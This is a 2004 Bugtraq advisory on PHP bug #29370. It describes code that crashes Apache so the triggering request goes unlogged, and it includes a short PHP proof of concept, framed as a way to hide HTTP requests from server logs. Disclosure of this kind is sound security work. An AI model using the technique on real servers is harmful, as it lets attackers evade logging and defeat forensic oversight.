[36029] in bugtraq
[PHP Bug] How to hide a HTTP request in the apache logs
daemon@ATHENA.MIT.EDU (Anthony Debhian)
Sat Aug 7 12:41:04 2004
Date: 6 Aug 2004 23:25:16 -0000
Message-ID: <20040806232516.20051.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Anthony Debhian <anthony.debhian@only-for.info>
To: bugtraq@securityfocus.com
Author: Debhian ( anthony.debhian -AT- only-for.info )
PHP Bug #29370
Description:
With a certain code, PHP causes a segfault in Apache and the request is not logged.
This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code.
The bug seems to work on all config (php4 / php5 && windows / unix)
Tested system:
Windows / Apache 1.3.31 / PHP 5.0.0
Windows / Apache 1.3.27 / PHP 4.3.3
Linux / Apache 1.3.24 / PHP 4.2.1
Proof of concept:
<?
function funcfunc($array,$space="")
{
foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
return $src;
}
function funcfunc2($array,$test)
{
foreach($array['test'] as $key=>$value) { }
return $array;
}
$test['debhy']['debhou']="test1";
$test['debhian']['debh']="test2";
$array=funcfunc($test);
$array=funcfunc2($array,"test");
?>
Solution:
The php team has not answered the posted bug yet.
